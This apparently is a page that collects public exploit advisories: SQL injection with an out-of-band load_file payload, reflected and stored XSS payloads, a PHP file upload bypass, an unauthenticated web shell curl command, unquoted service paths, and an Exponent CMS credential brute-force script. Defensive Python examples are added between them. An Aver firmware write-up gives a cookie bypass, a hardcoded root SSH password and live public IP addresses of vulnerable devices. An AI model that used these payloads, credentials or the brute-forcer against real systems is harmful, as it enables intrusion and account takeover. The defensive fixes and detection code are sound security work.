<pre><code>## Title: Video Sharing Website 1.0 SQL Injection<br />## Author: nu11secur1ty<br />## Date: 12.18.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html<br /><br />## Description:<br />The `email` parameter of the `ajax.php` script in Video Sharing Website 1.0<br />appears to be vulnerable to SQL injection attacks. The payload<br />'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'<br />was submitted in the email parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can take administrator<br />account control on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=jsmith@sample.com'+(select<br />load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''<br />AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND<br />'yreq'='yreq&password=jsmith123<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4x2rfk)<br /><br /></code></pre>
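As an added defensive illustration (not part of the advisory and not the application's own code), the following Python puts the query-building pattern that lets the `email` parameter rewrite the SQL next to a parameterised version, using the payload quoted above. It uses an in-memory SQLite table as a constructed stand-in for the application's users table (an assumption; the real schema is not on the page), so the injected `load_file()` call fails to resolve there instead of reaching MySQL, which is enough to show that the statement's structure was changed by the input.

```python
import sqlite3

# The payload from the advisory, as a raw string so the backslashes survive.
PAYLOAD = r"jsmith@sample.com'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'"


def make_db():
    """Constructed stand-in for the application's users table (assumption).
    Passwords would be hashed in real code; that is irrelevant to the injection point."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('jsmith@sample.com', 'jsmith123', 'user')")
    conn.commit()
    return conn


def build_unsafe_query(email, password):
    """String concatenation: the quote in the payload closes the literal and
    everything after it is parsed as SQL, which is how ajax.php became injectable."""
    return ("SELECT email, role FROM users "
            f"WHERE email = '{email}' AND password = '{password}'")


def login_unsafe(conn, email, password):
    """Run the concatenated query; returns rows, or a string describing the failure."""
    try:
        return conn.execute(build_unsafe_query(email, password)).fetchall()
    except sqlite3.OperationalError as exc:
        # SQLite has no load_file(); the error shows the injected text reached the parser.
        return f"query structure altered: {exc}"


def login_safe(conn, email, password):
    """Parameter binding: the payload is compared as a plain string and never parsed."""
    sql = "SELECT email, role FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_unsafe_query(PAYLOAD, "jsmith123"))
    print(login_unsafe(db, PAYLOAD, "jsmith123"))
    print(login_safe(db, PAYLOAD, "jsmith123"))            # [] : payload treated as data
    print(login_safe(db, "jsmith@sample.com", "jsmith123"))
```

The same fix applies to the `password` field and every other value that reaches a query in `ajax.php`: bind it as a parameter (in PHP, `mysqli_stmt::bind_param` or PDO placeholders) and never splice it into the SQL text.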
<pre><code>## Title: Cosmetics and Beauty Product Online Store v1.0 remote<br />Multiple XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 02.18.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html<br />## CVE-Cosmetics and Beauty Product Online Store v1.0<br /><br /><br />## Description:<br />The `search` parameter of the /cbpos/ app in Cosmetics and Beauty<br />Product Online Store v1.0 appears to be vulnerable to multiple<br />reflected XSS attacks.<br />The attacker can take very sensitive information from the system and<br />can even prepare a very dangerous RCE by using this XSS<br />vulnerability.<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```URL<br /><a href="https://www.pornhub.com/">Please visit our beauty store!</a><br /><a href="https://www.nu11secur1ty.com/"><img<br />src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"><br />```<br />- RCE example:<br /><br />```URL<br /><a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img<br />src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/sbzew8)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Signup Php Portal Arbitrary File Upload<br /># Google Dork: N/A<br /># Date: 19/12/2021<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://codecanyon.net/item/signup-php-portal/23066564<br /># Software Demo: https://ocsolutions.co.in/signup_custom_script/customer_register.php<br /># Category: webapps<br /># Version: 2.1<br /><br />1. Description<br /><br />The Signup Php Portal script contains an arbitrary file upload vulnerability:<br />using the signup form you can upload PHP files and bypass the security check with the Burp Suite intercept tool.<br /><br />Signup link:<br /><br />https://localhost/signup_custom_script/customer_register.php<br /><br />In the "other images" section, upload your file.php.gif and use the intercept tool in Burp Suite to edit the raw request.<br /><br />Details:<br /><br />POST /signup_custom_script/upload.php HTTP/1.1<br />Host: host<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962<br />Content-Length: 294712<br />Origin: https://localhost<br />Connection: close<br />Referer: https://localhost/signup_custom_script/customer_register.php<br />Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------232155580731505179933631361962<br />Content-Disposition: form-data; name="name"<br /><br />p1fna9ivqhk6g1fbjqto1f711ooq9.gif <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP<br />-----------------------------232155580731505179933631361962<br />Content-Disposition: form-data; name="file"; filename="2.php.gif" <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP<br />Content-Type: image/gif<br /><br />#####<br />forward and all done<br /><br />Your file name will be<br />p1fna9ivqhk6g1fbjqto1f711ooq9.php<br /><br />and this is the upload dir:<br /><br />https://localhost//signup_custom_script/uploads/<br /><br />Your file will be at this link:<br /><br />https://localhost//signup_custom_script/uploads/p1fna9ivqhk6g1fbjqto1f711ooq9.php<br /><br /><br /><br /><br /></code></pre>
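The request above works because the server names the stored file from client-controlled fields (the `name` form field and the `filename` in the `file` part) and only looks at the extension the client sent. As an added example that is not the portal's code, the following Python shows the server-side validation that closes this: an extension allowlist, a check that the bytes really start with that image type's magic header, a scan for embedded PHP tags as defence in depth, and a server-generated filename. The allowlist (GIF/PNG/JPEG) and the `check_upload` wrapper are assumptions made for the illustration; the filenames in the sample calls are the ones from the request above.

```python
import os
import secrets

# Extensions the image field should accept, each with the magic bytes the content
# must start with (assumption: the portal only needs GIF/PNG/JPEG here).
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, content, token=None):
    """Return the server-chosen stored filename or raise UploadRejected.

    Neither the client filename nor the separate "name" form field decides the
    stored name: the extension comes from the allowlist, after the content check,
    so editing "2.php.gif" to "2.php" in the request cannot produce a .php file.
    """
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("file content does not match the declared image type")
    # Defence in depth: a valid GIF header can still be followed by PHP source
    # (a polyglot); reject anything containing a PHP open tag.
    if b"<?php" in content or b"<?=" in content:
        raise UploadRejected("image contains embedded PHP tags")
    # The stored name is random (token is only overridable for testing).
    return f"{token or secrets.token_hex(16)}.{ext}"


def check_upload(client_filename, content, token=None):
    """Convenience wrapper returning ('ok', name) or ('rejected', reason)."""
    try:
        return "ok", validate_upload(client_filename, content, token)
    except UploadRejected as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    # Constructed inputs modelled on the request above.
    print(check_upload("2.php.gif", b"GIF89a" + bytes(16), token="demo"))
    print(check_upload("p1fna9ivqhk6g1fbjqto1f711ooq9.php", b"<?php echo 1; ?>"))
    print(check_upload("2.php.gif", b"<?php echo 1; ?>"))
    print(check_upload("banner.gif", b"GIF89a<?php echo 1; ?>"))
```

Two configuration points belong with this check: the uploads directory should be served with script execution disabled (or sit outside the web root and be served through a handler), and the `name` field in the multipart body should not be read at all when choosing where the file is written.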
<pre><code>#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : TOSHIBA<br />#Version : TOSHIBA Navi Support Service 1.00.0000<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br />C:\Users\Administrador>sc qc TNaviSrv<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: TNaviSrv<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD<br />PLAYER\TNaviSrv.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : TOSHIBA Navi Support Service<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /><br /></code></pre>
<pre><code># Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)<br /># Google Dork: inurl:/alfacgiapi intext:alfa<br /># Date: 2021-12-19<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: http://solevisible.com<br /># Software Link: https://phpshells.com/alfa-tesla-v4-1-shell<br /># Version: v4.1<br /># Tested on: Windows 10 Enterprise x64, Linux<br /><br /># [ About - ALFA TEAM SHELL TESLA ] :<br /><br /># It is one of the most popular web shells used by hackers; they use it to access the server side.<br /><br /># [ Vulnerable Files ] :<br /><br /># 1 . perl.alfa<br /># 2 . bash.alfa<br /># 3 . py.alfa<br /><br /># [ Description ]:<br /><br /># Commands can be executed without authenticating or logging in to the web shell.<br /># To use it, find just one of the vulnerable files,<br /># convert your command to base64 and submit the request using the cmd parameter and the POST method.<br /><br /># [ POC ] :<br /><br />curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa<br /></code></pre>
<pre><code>#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path<br />#Exploit Date: 2022-02-17<br />#Vendor : IVT Corp<br />#Version : BlueSoleilCS 5.4.277<br />#Vendor Homepage : www.ivtcorporation.com<br />#Tested on OS: Windows 7 Pro<br /><br />#This software installs EDTService.exe version 11.10.2.1<br /><br />#Analyze PoC :<br />==============<br />C:\>sc qc BlueSoleilCS<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: BlueSoleilCS<br /> TIPO : 120 WIN32_SHARE_PROCESS (interactive)<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files\IVT<br />Corporation\BlueSoleil\BlueSoleilCS.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : BlueSoleilCS<br /> DEPENDENCIAS : RPCSS<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code>Firmware for Aver EVC300 (multipoint video conferencing system) v00.10.16.36 and others (as well as firmware for several other devices manufactured by Aver, potentially all multipoint video conferencing systems) contains multiple advanced features that are not well documented:<br /><br />1. The web admin server continues to run even if web administration is disabled. The check for whether access is local to the device or remote is done in JavaScript using a specific cookie.<br />By setting the cookie as follows during page load:<br /><br />document.cookie="VnsSuperPassword=#qC9,kD:;CupSuperPassword=fu.1u3wk4;"<br />it is possible to bypass the remote access restrictions and use the "local" UI.<br /><br />2. Once the "access restrictions" are bypassed, it is possible to enable normal remote access. It is also possible to reset the admin password by setting<br />a JavaScript variable in adminPwd.js (variable name j in the version we had available) to 1 using JS debugging. This disables the security check asking to enter the prior password.<br />This feature is obviously an educational tool to acquaint children with the browser debug console.<br /><br />3. The URL <EVC300 IP>/monitor/monitor.jpg is accessible regardless of authentication status, and shows a low-resolution image of the monitor the device is connected to, or of the camera, depending on device status.<br />Older versions of the firmware used the URL "rimg/monitor.jpg".<br /><br />4. The device has an ssh daemon (dropbear; others on other devices) listening on ports 1587, 1588 and 1589.<br />It also has a hardcoded account avermediainfo with password avi2008 that has root privileges on the device.<br /><br />1587/tcp open ssh syn-ack ttl 63 Dropbear sshd 2013.60 (protocol 2.0)<br />1588/tcp open ssh syn-ack ttl 62 Dropbear sshd 2013.60 (protocol 2.0)<br />1589/tcp open ssh syn-ack ttl 62 Dropbear sshd 2013.60 (protocol 2.0)<br /><br />5. By accessing the device over ssh, one can read the file /mnt/others/var/Olympus/Athena.ini, where the administrator password is stored in clear text ("1234" is the default password):<br />Password="*****"<br />PPPoEPassword="aver"<br />SIPTerminalPassword=""<br />SIPServerPasswordOn=Y<br />SIPServerPassword="1234"<br />IwbPw="1234"<br />AccessCode="1234"<br />RegGatekeeperPwd=""<br />This is very convenient in case one has forgotten the administrator password and does not want to bother with the JS console.<br /><br />6. As of the time of writing, the above features can be enjoyed at the site vcdemo.aver.com (61.219.195.10), as well as at several other IP addresses in the same range, such as 61.219.195.23.<br />Additional edutainment endpoints can be found by using Nmap, or, for example, by using censys.io to search the HTML title (services.http.response.html_title="Video Conference") and then checking the resulting IP addresses.<br /><br /><br /></code></pre>
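Both the ALFA TESLA advisory earlier on this page and item 3 of the Aver write-up describe requests that stand out in a web server's access log: any hit into `/alfacgiapi/` or for a `*.alfa` file, and unauthenticated fetches of `/monitor/monitor.jpg` (or the older `/rimg/monitor.jpg`). The following Python is an added detection example, not code from either advisory; it parses Apache/nginx "combined" log lines (an assumed format) and flags matches for both. The log lines are constructed with RFC 5737 documentation addresses.

```python
import re
from collections import namedtuple

# Apache/nginx "combined" access-log line (assumption: the hosts log in that format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

Hit = namedtuple("Hit", "ip ts method path status rule")

# One rule per advisory: requests into /alfacgiapi/ or for a *.alfa file
# (the Alfa TESLA shell), and the Aver monitor snapshot at its current and older path.
RULES = (
    ("alfa-webshell", re.compile(r"/alfacgiapi/|\.alfa(\?|$)", re.IGNORECASE)),
    ("aver-monitor-snapshot", re.compile(r"^/(monitor|rimg)/monitor\.jpg(\?|$)", re.IGNORECASE)),
)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Dec/2021:10:00:01 +0000] "POST /alfacgiapi/perl.alfa HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.3 - - [19/Dec/2021:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Dec/2021:10:00:09 +0000] "GET /wp-content/uploads/x.alfa?x=1 HTTP/1.1" 200 300 "-" "curl/7.68.0"
198.51.100.9 - - [19/Dec/2021:10:01:00 +0000] "GET /monitor/monitor.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Dec/2021:10:01:30 +0000] "GET /rimg/monitor.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return a Hit for every parsable line whose request path matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["path"]):
                hits.append(Hit(rec["ip"], rec["ts"], rec["method"], rec["path"], rec["status"], name))
                break
    return hits


def by_source(hits):
    """Count hits per client address, a quick triage view for the responder."""
    counts = {}
    for h in hits:
        counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h.rule:24} {h.ip:15} {h.method} {h.path} -> {h.status}")
    print(by_source(found))
```

A `.alfa` request with a 200 response is worth treating as a confirmed web shell on disk, since the path only answers if the file exists; for the Aver snapshot, which legitimate administrators also fetch, the useful signal is repeated hits from addresses that never authenticated.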
<pre><code>#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-14<br />#Vendor : Hewlett-Packard(HP)<br />#Version : File Sanitizer for HP ProtectTools 5.0.1.3<br />#Vendor Homepage : http://www.hp.com<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc HPFSService<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: HPFSService<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File<br />Sanitizer\HPFSService.exe<br /> GRUPO_ORDEN_CARGA : File System<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities<br /># Exploit Author: heinjame<br /># Date: 22/10/2021<br /># Exploit Author: picaro_o<br /># Vendor Homepage: https://www.exponentcms.org/<br /># Version: <=2.6<br /># Tested on: Linux os<br /><br />*Stored XSS*<br /><br />Affected parameter:<br />http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,<br />Text Block)<br /><br />Payload = <iframe/src="data:text/html,<svg onload=alert(1)>"><br /><br />*Database credentials are disclosed in the response*<br /><br />POC<br />```<br />var adminerwindow = function (){<br />    var win =<br />window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');<br />    if (!win) { err(); }<br />}<br />```<br /><br />*Authentication Bruteforce*<br />```<br />import argparse<br />import requests<br />import sys<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("url", help="URL")<br />parser.add_argument("Username list", help="Username List")<br />parser.add_argument("Password list", help="Password List")<br />pargs = parser.parse_args()<br /><br />host = sys.argv[1]<br />userlist = sys.argv[2]<br />passlist = sys.argv[3]<br /><br />try:<br />    readuser = open(userlist)<br />    readpass = open(passlist)<br />except OSError:<br />    print("Unable to load files")<br />    sys.exit(1)<br /><br /><br />def usernamebrute():<br />    s = requests.Session()<br />    for username in readuser.readlines():<br />        username = username.strip()<br />        brute = {<br />            'controller': (None, 'users'),<br />            'src': (None, ''),<br />            'int': (None, ''),<br />            'action': (None, 'send_new_password'),<br />            'username': (None, username),<br />        }<br />        # multipart POST to the password-reset action, then read the result page<br />        bruteforce = s.post(host + "/index.php", files=brute)<br />        status = s.get(host + "/users/reset_password")<br />        if "administrator" in status.text:<br />            print("[+] Found username : " + username)<br />            return username, True<br />    # no username produced the administrator response<br />    return None, False<br /><br /><br />def passwordbrute(adminaccount):<br />    s = requests.Session()<br />    csrf = {"csrftoken": "abc"}<br />    s.cookies.set("csrftoken", "abc")<br />    header = {<br />        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',<br />        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />        'Accept-Language': 'en-US,en;q=0.5',<br />        'Accept-Encoding': 'gzip, deflate',<br />        'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',<br />        'Referer': host + '/login/showlogin'<br />    }<br />    for password in readpass.readlines():<br />        password = password.strip()<br />        brute = {<br />            'controller': 'login',<br />            'src': '',<br />            'int': '',<br />            'action': 'login',<br />            'username': adminaccount,<br />            'password': password<br />        }<br />        bruteforce = s.post(host + "/index.php", headers=header, data=brute)<br />        # print(bruteforce.text)<br />        status = s.get(host + "/login/showlogin", cookies=csrf)<br />        print(status.text)<br />        if "Invalid Username / Password" not in status.text:<br />            print("[+] Found Password : " + password)<br />            break<br /><br /><br />adminaccount, checkpoint = usernamebrute()<br />if checkpoint:<br />    passwordbrute(adminaccount)<br />else:<br />    print("Can't find username, we can't proceed sorry :(")<br /><br />```<br /></code></pre>
<pre><code>#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : Intel<br />#Version : Intel(R) Management Engine Components 6.0.0.1189<br />#Vendor Homepage : https://www.intel.com<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc LMS<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: LMS<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)<br />Management Engine Components\LMS\LMS.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Intel(R) Management and Security Application<br />Local Management Service<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
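The four unquoted-service-path advisories on this page (TNaviSrv, BlueSoleilCS, HPFSService and LMS) all rest on the same `sc qc` reading: an unquoted `BINARY_PATH_NAME` containing spaces, run as `LocalSystem` at boot. The following Python is an added audit helper, not code from any of the advisories: it parses `sc qc` output, decides whether the path is unquoted and contains spaces, lists the intermediate `.exe` locations Windows may try first (the directories whose ACLs an administrator must confirm are not writable by standard users), and produces the quoted `binPath` to set. The English and Spanish field labels are an assumption covering the listings above; other locales would need their label added. The sample is constructed from the TNaviSrv listing with its e-mail line wrap undone.

```python
import re

# Labels for the fields we need, in English and Spanish `sc qc` output
# (assumption: other locales need their label added here).
BINPATH_LABELS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")
SERVICE_LABELS = ("SERVICE_NAME", "NOMBRE_SERVICIO")

# Constructed from the TNaviSrv listing in the advisory above, line wrap undone.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: TNaviSrv
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\\Program Files (x86)\\TOSHIBA\\TOSHIBA DVD PLAYER\\TNaviSrv.exe
        NOMBRE_MOSTRAR     : TOSHIBA Navi Support Service
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""


def _field(text, labels):
    """Value of the first line whose label (text before the first colon) is in labels."""
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().upper() in labels:
            return value.strip()
    return None


def split_exe_and_args(binpath):
    """Split an unquoted binPath at the first '.exe' (assumption: the service
    binary is an .exe and anything after it is arguments)."""
    m = re.search(r"\.exe\b", binpath, re.IGNORECASE)
    if not m:
        return binpath, ""
    return binpath[:m.end()], binpath[m.end():].strip()


def search_candidates(exe):
    """Paths CreateProcess may try before the real binary when the path is
    unquoted: each prefix ending at a space, with '.exe' appended."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit_sc_qc(text):
    """Audit one `sc qc` listing; returns a dict with the finding and the fix."""
    service = _field(text, SERVICE_LABELS)
    binpath = _field(text, BINPATH_LABELS)
    if binpath is None:
        raise ValueError("no binary path field found")
    quoted = binpath.startswith('"')
    exe, args = split_exe_and_args(binpath)
    vulnerable = (not quoted) and (" " in exe)
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return {
        "service": service,
        "binpath": binpath,
        "unquoted_with_spaces": vulnerable,
        "candidates": search_candidates(exe) if vulnerable else [],
        "quoted_binpath": fixed if vulnerable else binpath,
    }


if __name__ == "__main__":
    result = audit_sc_qc(SAMPLE_SC_QC)
    print(result["service"], "unquoted with spaces:", result["unquoted_with_spaces"])
    for cand in result["candidates"]:
        print("  check ACL on parent of:", cand)
    print("  set binPath to:", result["quoted_binpath"])
```

The remediation is the quoted path written back with `sc config <service> binPath= "..."` (the inner quotes escaped as `\"` on the cmd line) or, where the vendor ships a fix, an updated installer; the candidate list is only there to prioritise which directories' ACLs to review when the fix cannot be applied immediately.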